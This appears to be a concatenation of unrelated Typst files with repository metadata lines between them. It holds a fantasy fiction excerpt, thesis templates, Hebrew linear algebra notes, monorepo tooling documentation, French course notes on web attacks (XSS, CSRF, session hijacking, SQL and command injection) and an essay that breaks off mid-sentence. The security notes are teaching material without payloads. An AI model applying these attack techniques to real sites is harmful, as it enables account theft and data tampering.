#figure(image("002_The Path to Opulent/04.jpg", width: 100%), caption: [Domri, Anarch of Bolas | Art by: Raymond Swanland], supplement: none, numbering: none)
Kaya looked angry enough to follow and drag him back, and I was angry enough to cut out his fool tongue.
But another crop of Eternals was coming up the other side of the hill. So, with a collective sigh, we all prepared for another fight.
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[IV.]]
I couldn't hear the words—they were meant for Planeswalkers, not for someone that was anyone like me—but I felt <NAME>'s mind-touch like a stone skipping across the liquid surface of my psyche.
But for Mistress Kaya, it was clearly more intense. Distracted—even a little pained—by whatever <NAME> had projected, she was nearly split in two by the axe of yet another Eternal minotaur before I pulled her out of the way.
"Did you hear that?" Teyo asked, confused.
"Hear what?" I prompted, while jumping on the minotaur's back and—unable to reach around its horns to stab it through the eye sockets—plunging my two little daggers into its neck.
We were still amid the pack. The Gruul were gone. Some had followed <NAME>. Some had followed my father. But the Simic and Izzet fighters were still with us, as were Miss Samut, Miss Kiora, Miss Rai, and Miss Huatli.
My attack on the bull-headed Eternal did little damage, but it got the creepy's attention off Mistress Kaya, which was my main goal anyway. I jumped off and scurried away behind one of Teyo's shields.
The confused minotaur looked around for, well~me. It gave Mistress Kaya time to recover and use her own spectral daggers to send that Eternal to its eternal rest.
Suddenly, another Planeswalker—a large viashino with lime-green skin—materialized right in front of us.
He had just enough time to hiss, "What izzzz thissss?" before a female Eternal grabbed him from behind. The Eternal used no weapon on the lizard-man, but what followed was pure horror show: the creepy seemed to draw the viashino's life force right out of his back, like an Izzet fan sucking up a flame. She absorbed that fire until it glowed from within her lazotep body, glowed brightly enough to create—or at least highlight—cracks in her lazotep shell.
The viashino fell, a lifeless husk, as the Eternal burst into flames from the inside out. Then that fire rocketed into the air, shooting like a comet toward Tenth District Plaza and the dragon. The burned-out Eternal collapsed atop the dead lizard, as if they had been lovers, dying together in a final embrace.
We were lucky <NAME> was already killing the last creepy of this particular crop, because everyone else just stood there in total shock.
Just then, I felt <NAME>'s mind-touch again. I looked toward a grimacing Teyo, who read my questioning eyes and said, "It was Beleren of the Gatewatch. He said, 'Retreat. We need a plan. Contact every Planeswalker and guildmaster you can find. Meet us at the Azorius Senate. Now.'"
#emph[I guess we have new orders] ~
|
|
https://github.com/xkevio/parcio-typst | https://raw.githubusercontent.com/xkevio/parcio-typst/main/parcio-thesis/appendix.typ | typst | MIT License | #counter(heading).update(0)
#heading(numbering: "A.", supplement: "Appendix")[Appendix]<appendix>
#figure(
caption: "Caption",
numbering: n => numbering("A.1", counter(heading).get().first(), n))[
```c
printf("Hello World!\n");
// Comment
for (int i = 0; i < m; i++) {
for (int j = 0; j < n; j++) {
sum += 'a';
}
}
```
] |
https://github.com/Karolinskis/KTU-typst | https://raw.githubusercontent.com/Karolinskis/KTU-typst/main/main.typ | typst | #set text(font: "Times New Roman")
#import "variables.typ": *
#include "mainPages/TitlePage.typ"
#include "mainPages/SecondPage.typ"
#include "mainPages/ThirdPage.typ"
#include "mainPages/PageSummaryLT.typ"
#include "mainPages/PageSummaryEN.typ"
#include "mainPages/TableOfContents.typ"
#include "mainPages/TableList.typ"
#include "mainPages/ImageList.typ"
#include "mainPages/TermsList.typ"
#set heading(numbering: "1.1")
#include "sections/testtext.typ" |
|
https://github.com/yonatanmgr/university-notes | https://raw.githubusercontent.com/yonatanmgr/university-notes/main/0366-%5BMath%5D/03661111-%5BLinear%20Algebra%201A%5D/src/lectures/03661111_lecture_14.typ | typst | #import "/template.typ": *
#import "@preview/colorful-boxes:1.2.0": *
#show: project.with(
title: "אלגברה לינארית 1א׳ - שיעור 14",
authors: ("<NAME>",),
date: "20 בפברואר, 2024",
)
#set enum(numbering: "(1.א)")
= הפיכת מטריצות
הכרנו את המטריצה המשוחלפת: $trs(A_(i j)) = A_(j i)$.
==== למה היא טובה?
תהי $A in M_(m xx n) (F)$ ונגדיר ה״ל $S_A = F^m -> F^n$ באופן הבא:
$ forall x in F^m: S_A (x) = x dot A = mat(x_1, x_2, dots, x_m) mat(-, R_1, -;-, R_2, -;, dots.v,;-, R_m, -) = sum_(i=1)^m x_i R_i $
מה תהיה המטריצה המייצגת ביחס לבסיסים הסטנדרטיים?
$ [S_A]_E^E = mat(|,|,,|;[S_A (e_1)]_E,[S_A (e_2)]_E, dots.h.c,[S_A (e_m)]_E;|,|,,|) = mat(|,|,,|;R_1,R_2, dots.h.c,R_m;|,|,,|) = trs(A) $
== הפיכות של מטריצה
מטריצה $A in M_n (F)$ נקראת:
- *הפיכה מימין* אם קיימת $B in M_n (F)$ כך ש-$A dot B=I_n$.
- *הפיכה משמאל* אם קיימת $C in M_n (F)$ כך ש-$C dot A=I_n$.
- *הפיכה* אם קיימת $D in M_n (F)$ כך ש-$A dot D = D dot A = I_n$ ואז נסמן $D = inv(A)$.
=== (טענה) אם $A$ הפיכה מימין ומשמאל אז $A$ הפיכה, וההופכיות מימין ומשמאל זהות.
==== הוכחה
נניח $A B = C A = I_n$ ונראה $B = C$ ומכך נסיק ש-$A$ הפיכה עם $inv(A) =B = C$.
נראה כי $B = I_n dot B = (C A) dot B = C dot (A B) = C dot I_n = C$ כנדרש. #QED
==== מסקנה: המטריצה ההופכית היא יחידה.
=== דוגמאות
+ $ A = mat(1,2;3,5), space inv(A) = mat(-5,2;3,-1) $ $ A dot inv(A) = mat(1,2;3,5) mat(-5,2;3,-1) = mat(1,0;0,1) = I_n wide inv(A) dot A = mat(-5,2;3,-1) mat(1,2;3,5) = mat(1,0;0,1) = I_n $
+ $ A = mat(1,2;0,0), space A dot B_(2 xx 2) = mat(1,2;0,0) dot B = mat(square,square;0,0) != I_2 ==> "אינה הפיכה" A $
==== הערה: מטריצות שבהן שורת/עמודת אפסים אינן הפיכות.
#pagebreak()
=== (טענה) תהי $A in M_n (F)$. התנאים הבאים שקולים זה לזה: <c>
+ $A$ הפיכה.
+ אם $A$ מטריצה מייצגת של ה״ל $T$ אז $T$ איזומורפיזם.
+ קיים איזומורפיזם כך ש-$A$ המטריצה המייצגת שלו.
==== הוכחה
+ $arrl$ (2): קיימת $B in M_n (F)$ כך ש-$A B = B A = I_n$ וכן $T: U->W$ ה״ל כאשר $C,D$ בסיסים של $U,W$ בהתאמה ושניהם ממימד $n$ כך ש-$A=[T]_D^C$.
יהי $u in ker T$. נקבל $0= [T u]_D = [T]^C_D dot [u]_C = A dot [u]_C$. \ כלומר $[u]_C = I_n dot [u]_C = B dot A dot [u]_C =0$, ולכן $ker T = {0}$ ו-$T$ חח״ע ובפרט איזומורפיזם.
+ $arrl$ (3): נזכור ש-$A=[T_A]_E^E$ ומ-(2) נסיק שקיים איזומורפיזם ש-$A$ מייצגת.
+ $arrl$ (1): יהי $T: U->W$ איזומורפיזם כש-$dim U = dim W = n$ וגם $C,D$ בסיסים $U,W$ כך ש-$A=[T]_D^C$.
כעת $I_n = [I_U]_C^C = [inv(T) of T]_C^C = [inv(T)]_C^D dot [T]_D^C$, וגם $I_n = [I_W]_C^C = [T of inv(T)]_C^C =[T]_D^C dot [inv(T)]_C^D $.
כלומר $inv(A) = [inv(T)]_C^D$.
#QED
=== (משפט) תהי $A in M_n (F)$. אז: <a>
+ אם קיימת $B in M_n (F)$ כך ש-$A B = I_n$, אז $A$ הפיכה עם $inv(A)=B$.
+ אם קיימת $B in M_n (F)$ כך ש-$B A = I_n$, אז $A$ הפיכה עם $inv(A)=B$.
==== הוכחה
נזכור כי $A = [T_A]^E_E$ כאשר $T_A: F^n -> F^n$ ולכן אם $T_A$ חח״ע או על, לפי @c, $A$ הפיכה.
+ אם $A B = I_n$ אז לכל $x in F^n$ מתקיים $x = I_n dot x = A dot (B x)$ כלומר $Im(T_A)=F^n$ ולכן $T_A$ על ואיזומורפיזם כפי שרצינו.
+ אם $B A = I_n$ וניקח $x in ker T_A$ אז: $T_A (x) = 0 = A dot x$. כלומר: $ x = I_n dot x = (B A) dot x = B dot (A x) = B dot 0 = 0 $ ואכן $ker T_A = {0}$ ו-$T_A$ חח״ע ואיזומורפיזם.
#QED
=== תכונות המטריצה ההפוכה <b>
+ אם $A in M_n (F)$ הפיכה אז $inv((inv(A)))$.
+ אם $A in M_n (F)$ הפיכה גם $trs(A)$ הפיכה עם $inv((trs(A))) = trs((inv(A)))$.
+ אם $A, B in M_n (F)$ הפיכות גם $A dot B$ הפיכה עם $inv((A B)) = inv(B) dot inv(A)$. \ בהכללה, אם $A_1, dots, A_n in M_m (F)$ הפיכות אז $A_1 dot dots dot A_m$ הפיכה עם: $ inv((A_1 dot dots dot A_m)) = inv(A_m) dot dots dot inv(A_1) $
==== הוכחה
+ $A dot inv(A) = I_n$ ולכן $A$ הופכית משמאל של $inv(A)$ ומ-@a $inv((inv(A))) = A$.
+ $A dot inv(A) = I_n$ ולכן: $trs((inv(A))) dot trs(A) = trs((A dot inv(A))) = trs(I_n) = I_n $ כלומר $trs((inv(A)))$ היא הופכית משמאל של $trs(A)$, ומ-@a $inv((trs(A))) = trs((inv(A)))$.
+ $B dot inv(B) = A dot inv(A) = I_n$. נחשב: $(A B)(inv(B) dot inv(A)) = A dot (B dot inv(B)) dot inv(A) = A dot inv(A) = I_n$. כלומר $inv(B) inv(A)$ הופכית מימין של $A B$ ונסיק $inv((A B)) = inv(B) dot inv(A)$.
#QED
#pagebreak()
=== (טענה) תהי $A in M_n (F)$. אזי, $A$ הפיכה אם״ם לכל $b in F^n$ למערכת $A x = b$ קיים פתרון יחיד.
==== הוכחה
- $arrow.double.l$: נניח ש-$A$ הפיכה ונתבונן במע׳ $A x = b$. נכפול משמאל ב-$inv(A)$ ונקבל $x = inv(A) A x =inv(A) b$ ולמע׳ קיים פתרון יחיד $x = inv(A) b$.
- $arrow.double.r$: נחפש $B in M_n (F)$ כך ש-$A dot B = I_n$. כלומר: $ A= underbrace(mat(|, |, , |; c_1, c_2, dots.h.c, c_n; |,|,,|), B) = mat(|, |, , |; A c_1, A c_2, dots.h.c, A c_n; |,|,,|) = underbrace(mat(|, |, , |; e_1, e_2, dots.h.c, e_n; |,|,,|), I_n) $
קיבלנו $n$ מע׳ משוואות לינאריות: $A c_1 = e_1, A c_2 = e_2, dots, A c_n = e_n$. מהנתון, לכל אחת מהמערכות קיים פתרון יחיד, ופתרונות אלה ירכיבו את המטריצה $B$, ומ-@b, אם $B$ ההופכית מימין של $A$ אז $A$ הפיכה.
#QED
==== מסקנה
בכדי למצוא מטריצה הופכית $B=mat(|, |, , |; c_1, c_2, dots.h.c, c_n; |,|,,|)$ עלינו לפתור $n$ מע׳ עם אותה מטריצת מקדמים מצומצמת $A$. \ נדרג במקביל את כל המע׳:
$ mat(space,|,|,,|;A space, space e_1,e_2, dots.h.c, e_n; space, |,|,,|;augment:#1) arrow.long.squiggly_"מדרגים לצורה קנונית" mat(space,|,|,,|;I_n space, space c_1,c_2, dots.h.c, c_n; space, |,|,,|;augment:#1) $
==== דוגמאות
+ $ A = mat(1,2;3,5) \ mat(A space, space I_2;augment:#1) = mat(1,2,1,0;3,5,0,1;augment:#2) -->_(R_2<-R_2-3 R_1) mat(1,2,1,0;0,-1,-3,1;augment:#2) arrow.squiggly mat(1,0,-5,2;0,1,3,-1;augment:#2) => inv(A) = mat(-5,2;3,-1) $ כלומר $A$ הפיכה.
+ $ A = mat(1,2;3,6) \ mat(A space, space I_2;augment:#1) = mat(1,2,1,0;3,6,0,1;augment:#2) -->_(R_2<-R_2-3 R_1) mat(1,2,1,0;0,0,-3,1;augment:#2) $
לא הגענו למטריצת היחידה משמאל ונסיק ש-$A$ אינה הפיכה.
=== (הגדרה) מטריצה אלמנטרית
מטריצה נקראת *אלמנטרית* אם היא מתקבלת ממטריצת היחידה ע״י הפעלת פעולת שורה אלמנטרית אחת. לדוגמה:
$ "מטריצות אלמנטריות" cases(mat(1,0,0;0,1,0;0,0,1) -->^(R_1 <-> R_3) mat(0,0,1;0,1,0;1,0,0) \ -->^(R_3 <- 7R_2) mat(1,0,0;0,1,0;0,0,7) \ -->^(R_2 <- R_2 - 3R_1) mat(1,0,0;-3,1,0;0,0,1)) $
|
|
https://github.com/binhtran432k/ungrammar-docs | https://raw.githubusercontent.com/binhtran432k/ungrammar-docs/main/contents/literature-review/lerna.typ | typst | == Lerna and NX <sec-lerna>
Lerna and NX are powerful tools designed to manage complex JavaScript monorepo
projects efficiently. This section will explore their key features, benefits,
and challenges, as well as their integration with each other to create a robust
development environment.
Lerna and NX offer a powerful solution for managing JavaScript monorepo
projects. By combining their strengths, developers can benefit from improved
organization, faster development, and simplified dependency management. While
there may be a learning curve associated with using these tools, the long-term
benefits outweigh the challenges @bib-lerna.
=== Lerna
- *Monorepo Management*: Lerna is specifically designed for managing JavaScript
projects with multiple packages within a single repository.
- *Versioning and Publishing*: Lerna simplifies versioning and publishing of
individual packages within the monorepo.
- *Dependency Management*: Handles dependencies between packages within the
monorepo, ensuring consistent versions across the project.
- *Workspaces*: Lerna supports workspaces, allowing developers to work on
multiple packages simultaneously within a single project.
=== NX
- *Build System*: NX is a versatile build system that can be used to manage and
build projects of any size and complexity.
- *Task Runner*: NX provides a powerful task runner for automating common
development tasks like testing, linting, and building.
- *Caching*: NX leverages caching to improve build performance by avoiding
unnecessary recompilation.
- *Distributed Build*: NX supports distributed builds, allowing for parallel
execution of tasks across multiple machines.
=== Lerna and NX Integration
- *Complementary Tools*: Lerna and NX complement each other, providing a
comprehensive solution for managing monorepo projects.
- *Shared Configuration*: Lerna and NX can share configuration settings,
streamlining the development process.
- *Workflow Integration*: Lerna and NX can be integrated into our existing
development workflows, providing seamless support for common tasks.
=== Benefits of Using Lerna and NX
- *Improved Project Organization*: Lerna and NX help organize large projects
into manageable packages, improving code maintainability and scalability.
- *Faster Development*: By leveraging caching and parallel execution, Lerna and
NX can significantly speed up build times.
- *Simplified Dependency Management*: Lerna's dependency management features
ensure consistent versions across packages, reducing the risk of conflicts.
- *Enhanced Collaboration*: Lerna and NX facilitate collaboration among team
members by providing a clear structure for managing multiple packages.
|
|
https://github.com/HEIGVD-Experience/docs | https://raw.githubusercontent.com/HEIGVD-Experience/docs/main/S4/ISI/docs/2-Intrusions/intrusion-web.typ | typst | #import "/_settings/typst/template-note.typ": conf
#show: doc => conf(
title: [
Intrusions web
],
lesson: "ISI",
chapter: "2 - Intrusions",
definition: "Ce document traite de la cryptographie, une discipline essentielle pour sécuriser les communications en ligne. Il couvre les concepts fondamentaux des appels et réponses HTTP, la gestion des cookies, les outils de sécurité web (OWASP), et les techniques d'attaques web telles que le détournement de session, le cross-site scripting (XSS), et l'injection de commandes.",
col: 1,
doc,
)
= Rappel technologie web
== Appel HTTP
=== Appel HTTP
Un appel HTTP est une requête envoyée par un client à un serveur. Il est composé de deux parties : une ligne de requête et un corps de requête. La ligne de requête contient la méthode HTTP, l'URI et la version du protocole. Le corps de requête contient les données envoyées par le client.
==== Exemple d'appel HTTP
```
GET / HTTP/1.1
Host: www.lemonde.fr
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) …
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: _ga=GA1.2.374864853.1475228586; xtvrn=$43260$; _cb_ls=1...
If-Modified-Since: Fri, 30 Sep 2016 16:10:47 GMT
```
=== Réponse HTTP
Une réponse HTTP est envoyée par un serveur à un client. Elle est composée de deux parties : une ligne de statut et un corps de réponse. La ligne de statut contient la version du protocole, le code de statut et le message de statut. Le corps de réponse contient les données envoyées par le serveur.
==== Exemple de réponse HTTP
```
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2016 16:10:47 GMT
Server: Apache
Last-Modified: Fri, 30 Sep 2016 16:10:47 GMT
ETag: "1d3-53e3a1f1f7d00"
Accept-Ranges: bytes
Content-Length: 467
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
```
=== En-têtes HTTP
Les en-têtes HTTP sont des informations supplémentaires envoyées avec une requête ou une réponse HTTP
==== Exemple d'en-têtes HTTP
===== Generaux
```
Cache-Control: max-age=3600, public
Date: Tue, 15 Nov 2005 08:12:31 GMT
```
===== Requêtes
```
Accept: text/plain;q=0.5, text/html
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8
From: <EMAIL>
Referer: http://www.iict.ch/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Cookie: PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120; foo=bar
Authorization: Basic bXl1c2VyOm15cGFzcw==
```
===== Réponse
```
Location: http://www.heig-vd.ch
Server: Microsoft-IIS/6.0
Set-Cookie: session-id=120-7333518-8165026; path=/; domain=.amazon.com; expires=Sat Feb 27…
```
===== Contenu
```
Content-Encoding: gzip
Content-Length: 3495 (en octets)
Content-Type: text/html; charset=ISO-8859-4
Last-Modified: Tue, 15 Nov 2005 12:45:26 GMT
```
=== HTTP sans état
HTTP est un protocole sans état, ce qui signifie que le serveur ne conserve pas l'état de la session entre les requêtes. Cela signifie que chaque requête est traitée indépendamment des autres requêtes.
=== Cookies
Les cookies sont des fichiers stockés sur le client qui contiennent des informations sur l'utilisateur. Ils sont envoyés avec chaque requête HTTP et permettent au serveur de conserver l'état de la session entre les requêtes.
==== Exemple de cookie
- Set-Cookie (dans une réponse) : dépose un cookie sur le client.
- Cookie (dans une requête) : valeur du cookie déposé auparavant.
= Références et outils
== OWASP
- Open Web Application Security Project (OWASP)
- Organisation internationale, Open Source
- Participation gratuite et ouverte à tous
- Mission : promouvoir la sécurité des applications
== Outils
- Plugins pour navigateurs (Tamper data, Firebug, etc.)
- Outils externes, interception et analyse des communications
- Exemple : Proxys d'interception
- Logiciels de proxy avec beaucoup de fonctionnalités
- Exemple : Burp suite
== Outils automatisés
- Scanner/fuzzer/spider Web
- SAST = Static Analysis Security Tools
- DAST = Dynamic Analysis Security Tools
=== SAST
#image("/_src/img/docs/image copy 50.png")
#colbreak()
=== DAST
#image("/_src/img/docs/image copy 51.png")
== Proxys d'interception
- Règles / Interception
- Historique ou Spider
- Match-and-replace
- Fuzzer
- Scanner de vulnérabilités
- Requêtes manuelles
- Analyse des cookies/sessions/tokens
#image("/_src/img/docs/image copy 49.png")
= Attaques WEB
- Manipulation des données (URL, cookies, etc.)
- Contournement de protections côté client
- «Session Hijacking»
- «Cross-site scripting» (XSS)
- «Cross-site request forgeries» (CSRF)
- Injections de commandes (SQL ou autres)
== Objectifs d'une attaque
- Contourner un mécanisme de sécurité (authenticité ou …)
- Extraire des données (confidentialité)
- Ajouter ou modifier des données (integrité)
- Déterminer le schéma de la base de données
== Points d'injection
=== Premier ordre
- L'application traite incorrectement une donnée malveillante directement
- Exemples:
- Entrées utilisateur / formulaires
- Cookies
- URLs
=== Second ordre
- L'application traite incorrectement une donnée enregistrée précédemment
- Exemples:
- Contenu d'une base de données
- Fichiers uploadés
- Variables côté serveur
== Protection côté client
Toute protection côté client peut être contournée. C'est pourquoi il est important de mettre en place des protections côté serveur.
- Contenu des cookies
- En-tête HTTP (Referer, User-agent, etc.)
- Champs des formulaires (même si cachés, restreint au choix dans une liste, ou validés en javascript)
- Tout contrôle en javascript (fait côté client)
Une application web doit toujours répéter chaque validation côté serveur.
== Détournement de session
- Un attaquant récupère un identifiant de session valide pour contourner le mécanisme d'authentification.
- La technique varie en fonction du protocole (TCP, HTTP)
- Courant pour HTTP: vol de cookie, vol d'URL, falsification d'URL, etc.
#image("/_src/img/docs/image copy 52.png")
== Cross-site scripting (XSS)
=== Reflected XSS (sans persistance)
- Le client contrôle une valeur utilisée telle quelle dans la réponse
- Exemple : moteurs de recherche personnalisés.
=== Stored XSS (avec persistance)
- Le client contrôle une valeur enregistrée côté serveur.
- La valeur est utilisée ultérieurement dans plusieurs autres réponses.
- Exemples : forums, livre d'or, ....
=== DOM-based XSS
- Modification du « Document Object Model » (DOM)
- La payload n'est pas dans la réponse mais dans l'URL, et exploite une faille dans le code côté client.
=== Vol de cookies (XSS par mail)
#image("/_src/img/docs/image copy 53.png")
#colbreak()
=== Vol de cookies (XSS sur un forum)
#image("/_src/img/docs/image copy 54.png")
=== DOM-based XSS
#image("/_src/img/docs/image copy 55.png")
== CSRF (Cross-site request forgery)
- Objectif = forcer la victime à exécuter une action malveillante sur une application web
- La victime ouvre une URL malveillante
- L'attaque déclenche une requête vers le site ciblé
#image("/_src/img/docs/image copy 56.png")
== Injection de commandes
=== Injections dans des commandes SQL
- Une donnée utilisateur sert à construire une commande SQL pour la base de données.
- Formulaire, cookie, paramètre de l'URL, etc.
- Sans protection, il est possible de modifier le sens de la commande SQL!
- Et donc de manipuler la base de données !
- Vol de la base de données (tout ou partie)
- Destruction de la base de données (tout ou partie)
- Modification/altération des données
=== Injection dans une commande système
- Même idée, mais l'application construit une commande système (shell)
- e.g. php include (https://brightsec.com/blog/code-injection-php/)
- Il devient possible d'exécuter des commandes autres que celles prévues par le développeur
#image("/_src/img/docs/image copy 57.png") |
|
https://github.com/frectonz/the-pg-book | https://raw.githubusercontent.com/frectonz/the-pg-book/main/book/218.%20best.html.typ | typst | best.html
The Best Essay
March 2024Despite its title this isn't meant to be the best essay. My goal
here is to figure out what the best essay would be like.It would be well-written, but you can write well about any topic.
What made it special would be what it was about.Obviously some topics would be better than others. It probably
wouldn't be about this year's lipstick colors. But it wouldn't be
vaporous talk about elevated themes either. A good essay has to be
surprising. It has to tell people something they don't already know.The best essay would be on the most important topic you could tell
people something surprising about.That may sound obvious, but it has some unexpected consequences.
One is that science enters the picture like an elephant stepping
into a rowboat. For example, Darwin first described the idea of
natural selection in an essay written in 1844.
Talk about an
important topic you could tell people something surprising about.
If that's the test of a great essay, this was surely the best one
written in 1844.
And indeed, the best possible essay at any given
time would usually be one describing the most important scientific
or technological discovery it was possible to make.
[1]Another unexpected consequence: I imagined when I started writing
this that the best essay would be fairly timeless — that the best
essay you could write in 1844 would be much the same as the best
one you could write now. But in fact the opposite seems to be true.
It might be true that the best painting would be timeless in this
sense. But it wouldn't be impressive to write an essay introducing
natural selection now. The best essay now would be one describing
a great discovery we didn't yet know about.If the question of how to write the best possible essay reduces to
the question of how to make great discoveries, then I started with
the wrong question. Perhaps what this exercise shows is that we
shouldn't waste our time writing essays but instead focus on making
discoveries in some specific domain. But I'm interested in essays
and what can be done with them, so I want to see if there's some
other question I could have asked.There is, and on the face of it, it seems almost identical to the
one I started with. Instead of asking what would the best essay
be? I should have asked how do you write essays well? Though
these seem only phrasing apart, their answers diverge. The answer
to the first question, as we've seen, isn't really about essay
writing. The second question forces it to be.Writing essays, at its best, is a way of discovering ideas. How do
you do that well? How do you discover by writing?An essay should ordinarily start with what I'm going to call a
question, though I mean this in a very general sense: it doesn't
have to be a question grammatically, just something that acts like
one in the sense that it spurs some response.How do you get this initial question? It probably won't work to
choose some important-sounding topic at random and go at it.
Professional traders won't even trade unless they have what they
call an edge — a convincing story about why in some class of
trades they'll win more than they lose. Similarly, you shouldn't
attack a topic unless you have a way in — some new insight about
it or way of approaching it.You don't need to have a complete thesis; you just need some kind
of gap you can explore. In fact, merely having questions about
something other people take for granted can be edge enough.If you come across a question that's sufficiently puzzling, it could
be worth exploring even if it doesn't seem very momentous. Many an
important discovery has been made by pulling on a thread that seemed
insignificant at first. How can they all be finches?
[2]Once you've got a question, then what? You start thinking out loud
about it. Not literally out loud, but you commit to a specific
string of words in response, as you would if you were talking. This
initial response is usually mistaken or incomplete. Writing converts
your ideas from vague to bad. But that's a step forward, because
once you can see the brokenness, you can fix it.Perhaps beginning writers are alarmed at the thought of starting
with something mistaken or incomplete, but you shouldn't be, because
this is why essay writing works. Forcing yourself to commit to some
specific string of words gives you a starting point, and if it's
wrong, you'll see that when you reread it. At least half of essay
writing is rereading what you've written and asking is this correct
and complete? You have to be very strict when rereading, not just
because you want to keep yourself honest, but because a gap between
your response and the truth is often a sign of new ideas to be
discovered.The prize for being strict with what you've written is not just
refinement. When you take a roughly correct answer and try to make
it exactly right, sometimes you find that you can't, and that the
reason is that you were depending on a false assumption. And when
you discard it, the answer turns out to be completely different.
[3]Ideally the response to a question is two things: the first step
in a process that converges on the truth, and a source of additional
questions (in my very general sense of the word). So the process
continues recursively, as response spurs response.
[4]Usually there are several possible responses to a question, which
means you're traversing a tree. But essays are linear, not tree-shaped,
which means you have to choose one branch to follow at each point.
How do you choose? Usually you should follow whichever offers the
greatest combination of generality and novelty. I don't consciously
rank branches this way; I just follow whichever seems most exciting;
but generality and novelty are what make a branch exciting.
[5]If you're willing to do a lot of rewriting, you don't have to guess
right. You can follow a branch and see how it turns out, and if it
isn't good enough, cut it and backtrack. I do this all the time.
In this essay I've already cut a 17-paragraph subtree, in addition
to countless shorter ones. Maybe I'll reattach it at the end, or
boil it down to a footnote, or spin it off as its own essay; we'll
see.
[6]In general you want to be quick to cut. One of the most dangerous
temptations in writing (and in software and painting) is to keep
something that isn't right, just because it contains a few good bits
or cost you a lot of effort.The most surprising new question being thrown off at this point is
does it really matter what the initial question is? If the space
of ideas is highly connected, it shouldn't, because you should be
able to get from any question to the most valuable ones in a few
hops. And we see evidence that it's highly connected in the way,
for example, that people who are obsessed with some topic can turn
any conversation toward it. But that only works if you know where
you want to go, and you don't in an essay. That's the whole point.
You don't want to be the obsessive conversationalist, or all your
essays will be about the same thing.
[7]The other reason the initial question matters is that you usually
feel somewhat obliged to stick to it. I don't think about this when
I decide which branch to follow. I just follow novelty and generality.
Sticking to the question is enforced later, when I notice I've
wandered too far and have to backtrack. But I think this is
the optimal solution. You don't want the hunt for novelty and
generality to be constrained in the moment. Go with it and see what
you get.
[8]Since the initial question does constrain you, in the best case it
sets an upper bound on the quality of essay you'll write. If you
do as well as you possibly can on the chain of thoughts that follow
from the initial question, the initial question itself is the only
place where there's room for variation.It would be a mistake to let this make you too conservative though,
because you can't predict where a question will lead. Not if you're
doing things right, because doing things right means making
discoveries, and by definition you can't predict those. So the way
to respond to this situation is not to be cautious about which
initial question you choose, but to write a lot of essays. Essays
are for taking risks.Almost any question can get you a good essay. Indeed, it took some
effort to think of a sufficiently unpromising topic in the third
paragraph, because any essayist's first impulse on hearing that the
best essay couldn't be about x would be to try to write it. But if
most questions yield good essays, only some yield great ones.Can we predict which questions will yield great essays? Considering
how long I've been writing essays, it's alarming how novel that
question feels.One thing I like in an initial question is outrageousness. I love
questions that seem naughty in some way — for example, by seeming
counterintuitive or overambitious or heterodox. Ideally all three.
This essay is an example. Writing about the best essay implies there
is such a thing, which pseudo-intellectuals will dismiss as reductive,
though it follows necessarily from the possibility of one essay
being better than another. And thinking about how to do something
so ambitious is close enough to doing it that it holds your attention.I like to start an essay with a gleam in my eye. This could be just
a taste of mine, but there's one aspect of it that probably isn't:
to write a really good essay on some topic, you have to be interested
in it. A good writer can write well about anything, but to stretch
for the novel insights that are the raison d'etre of the essay, you
have to care.If caring about it is one of the criteria for a good initial question,
then the optimal question varies from person to person. It also
means you're more likely to write great essays if you care about a
lot of different things. The more curious you are, the greater the
probable overlap between the set of things you're curious about and
the set of topics that yield great essays.What other qualities would a great initial question have? It's
probably good if it has implications in a lot of different areas.
And I find it's a good sign if it's one that people think has already
been thoroughly explored. But the truth is that I've barely thought
about how to choose initial questions, because I rarely do it. I
rarely choose what to write about; I just start thinking about
something, and sometimes it turns into an essay.Am I going to stop writing essays about whatever I happen to be
thinking about and instead start working my way through some
systematically generated list of topics? That doesn't sound like
much fun. And yet I want to write good essays, and if the initial
question matters, I should care about it.Perhaps the answer is to go one step earlier: to write about whatever
pops into your head, but try to ensure that what pops into your
head is good. Indeed, now that I think about it, this has to be the
answer, because a mere list of topics wouldn't be any use if you
didn't have edge with any of them. To start writing an essay, you
need a topic plus some initial insight about it, and you can't
generate those systematically. If only.
[9]You can probably cause yourself to have more of them, though. The
quality of the ideas that come out of your head depends on what goes
in, and you can improve that in two dimensions, breadth and depth.You can't learn everything, so getting breadth implies learning
about topics that are very different from one another. When I tell
people about my book-buying trips to Hay and they ask what I buy
books about, I usually feel a bit sheepish answering, because the
topics seem like a laundry list of unrelated subjects. But perhaps
that's actually optimal in this business.You can also get ideas by talking to people, by doing and building
things, and by going places and seeing things. I don't think it's
important to talk to new people so much as the sort of people who
make you have new ideas. I get more new ideas after talking for an
afternoon with <NAME> than from talking to 20 new smart
people. I know because that's what a block of office hours at Y
Combinator consists of.While breadth comes from reading and talking and seeing, depth comes
from doing. The way to really learn about some domain is to have
to solve problems in it. Though this could take the form of writing,
I suspect that to be a good essayist you also have to do, or have
done, some other kind of work. That may not be true for most other
fields, but essay writing is different. You could spend half your
time working on something else and be net ahead, so long as it was
hard.I'm not proposing that as a recipe so much as an encouragement to
those already doing it. If you've spent all your life so far working
on other things, you're already halfway there. Though of course to
be good at writing you have to like it, and if you like writing
you'd probably have spent at least some time doing it.Everything I've said about initial questions applies also to the
questions you encounter in writing the essay. They're the same
thing; every subtree of an essay is usually a shorter essay, just
as every subtree of a Calder mobile is a smaller mobile. So any
technique that gets you good initial questions also gets you good
whole essays.At some point the cycle of question and response reaches what feels
like a natural end. Which is a little suspicious; shouldn't every
answer suggest more questions? I think what happens is that you
start to feel sated. Once you've covered enough interesting ground,
you start to lose your appetite for new questions. Which is just
as well, because the reader is probably feeling sated too. And it's
not lazy to stop asking questions, because you could instead be
asking the initial question of a new essay.That's the ultimate source of drag on the connectedness of ideas:
the discoveries you make along the way. If you discover enough
starting from question A, you'll never make it to question B. Though
if you keep writing essays you'll gradually fix this problem by
burning off such discoveries. So bizarrely enough, writing lots of
